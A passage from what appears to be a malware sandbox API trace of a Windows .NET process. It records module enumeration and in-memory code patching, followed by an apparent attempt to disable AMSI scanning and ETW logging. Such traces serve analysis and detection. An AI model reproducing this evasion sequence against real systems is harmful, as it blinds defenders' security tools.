SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0110.509] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0110.510] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0110.510] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0110.510] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0110.511] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0110.511] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0110.512] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0110.512] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0110.513] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0110.513] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0110.514] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0110.515] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0110.515] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0110.516] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0110.516] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74d00000, lpBaseName=0x18da14, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0110.811] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", lpSrch="\\system.ni.dll") returned 0x0 [0111.113] GetCurrentProcess () returned 0xffffffff [0111.113] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18c02c, cb=0x1000, lpcbNeeded=0x18d240 | out: lphModule=0x18c02c, lpcbNeeded=0x18d240) returned 1 [0111.114] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0111.114] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0111.114] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0111.114] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0111.114] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0111.114] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0111.114] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0111.115] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0111.115] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0111.115] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0111.115] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0111.115] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0111.116] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0111.116] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0111.116] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0111.117] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0111.117] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0111.117] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0111.118] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0111.118] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0111.118] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0111.119] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0111.119] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0111.120] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0111.120] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0111.121] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0111.121] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0111.121] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0111.122] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0111.123] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0111.123] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0111.124] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0111.124] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0111.125] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74d00000, lpBaseName=0x18d02c, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0111.141] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll", lpSrch="\\system.ni.dll") returned 0x0 [0111.510] GetCurrentProcess () returned 0xffffffff [0111.510] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x188b48, cb=0x1000, lpcbNeeded=0x189d5c | out: lphModule=0x188b48, lpcbNeeded=0x189d5c) returned 1 [0111.511] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0111.511] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0111.511] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0111.511] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0111.511] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0111.511] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0111.512] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0111.512] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0111.512] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0111.512] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0111.512] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0111.513] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0111.513] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0111.513] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0111.514] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0111.514] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0111.514] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0111.515] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0111.515] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0111.515] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0111.516] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0111.516] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0111.516] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0111.517] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0111.518] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0111.518] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0111.519] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0111.519] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0111.520] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0111.521] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0111.522] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0111.522] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0111.523] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0111.523] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0111.524] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74410000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x74410000, SizeOfImage=0x6a8000, EntryPoint=0x74557040)) returned 1 [0111.524] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74410000, lpBaseName=0x189b48, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0111.690] StrStrIW (lpFirst="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\500ffa28b327e171fe664023003e947e\\System.ni.dll", lpSrch="\\system.ni.dll") returned="\\System.ni.dll" [0111.690] CloseHandle (hObject=0xa0) [0111.691] VirtualProtect (in: lpAddress=0x75ba1245, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0111.695] VirtualProtect (in: lpAddress=0x75ba1245, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0111.715] GetCurrentProcess () returned 0xffffffff [0111.715] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba1245, dwSize=0x5) returned 1 [0111.715] VirtualProtect (in: lpAddress=0x75ba34b0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0111.716] VirtualProtect (in: lpAddress=0x75ba34b0, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0111.781] GetCurrentProcess () returned 0xffffffff [0111.781] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba34b0, dwSize=0x5) returned 1 [0111.781] VirtualProtect (in: lpAddress=0x75ba4950, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0111.782] VirtualProtect (in: lpAddress=0x75ba4950, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0111.810] GetCurrentProcess () returned 0xffffffff [0111.810] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba4950, dwSize=0x5) returned 1 [0111.810] VirtualProtect (in: lpAddress=0x75ba14b1, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0111.811] VirtualProtect (in: lpAddress=0x75ba14b1, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0111.842] GetCurrentProcess () returned 0xffffffff [0111.842] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba14b1, dwSize=0x5) returned 1 [0111.842] VirtualProtect (in: lpAddress=0x77bcff94, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0111.843] VirtualProtect (in: lpAddress=0x77bcff94, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0111.873] GetCurrentProcess () returned 0xffffffff [0111.873] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x77bcff94, dwSize=0x5) returned 1 [0111.874] VirtualProtect (in: lpAddress=0x75ba3f5c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0111.874] VirtualProtect (in: lpAddress=0x75ba3f5c, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0111.906] GetCurrentProcess () returned 0xffffffff [0111.906] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba3f5c, dwSize=0x5) returned 1 [0111.907] VirtualProtect (in: lpAddress=0x75ba196e, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0111.907] VirtualProtect (in: lpAddress=0x75ba196e, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0111.928] GetCurrentProcess () returned 0xffffffff [0111.928] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba196e, dwSize=0x5) returned 1 [0111.928] VirtualProtect (in: lpAddress=0x75ba18f1, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0111.929] VirtualProtect (in: lpAddress=0x75ba18f1, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0111.950] GetCurrentProcess () returned 0xffffffff [0111.950] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba18f1, dwSize=0x5) returned 1 [0111.950] VirtualProtect (in: lpAddress=0x75ba495d, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0111.950] VirtualProtect (in: lpAddress=0x75ba495d, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0112.016] GetCurrentProcess () returned 0xffffffff [0112.016] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba495d, dwSize=0x5) returned 1 [0112.016] VirtualProtect (in: lpAddress=0x75ba1410, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x20) returned 1 [0112.016] VirtualProtect (in: lpAddress=0x75ba1410, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x189d58 | out: lpflOldProtect=0x189d58*=0x40) returned 1 [0112.056] GetCurrentProcess () returned 0xffffffff [0112.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75ba1410, dwSize=0x5) returned 1 [0117.438] LoadLibraryA (lpLibFileName="amsi.dll") returned 0x0 [0117.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AmsiScanBuffer", cchWideChar=14, lpMultiByteStr=0x18a298, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AmsiScanBufferë\x01Ý\x8b\x07È\x94ÂAt\x14¦\x18", lpUsedDefaultChar=0x0) returned 14 [0117.476] GetProcAddress (hModule=0x0, lpProcName="AmsiScanBuffer") returned 0x0 [0117.618] VirtualProtect (in: lpAddress=0x0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x25c8974 | out: lpflOldProtect=0x25c8974*=0x0) returned 0 [0117.644] EtwEventRegister () returned 0x0 [0121.594] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x766d40) returned 1 [0121.624] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x18a1f8) returned 1 [0121.625] CoTaskMemAlloc (cb=0x20) returned 0x7879a8 [0121.625] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x7879a8, pdwDataLen=0x18a1f8, dwFlags=0x1 | out: pbData=0x7879a8, pdwDataLen=0x18a1f8) returned 1 [0121.637] CoTaskMemFree (pv=0x7879a8) [0121.637] CryptGetProvParam (in: hProv=0x766d40, dwParam=0x1, pbData=0x0, pdwDataLen=0x18a1f8, dwFlags=0x0 | out: pbData=0x0, 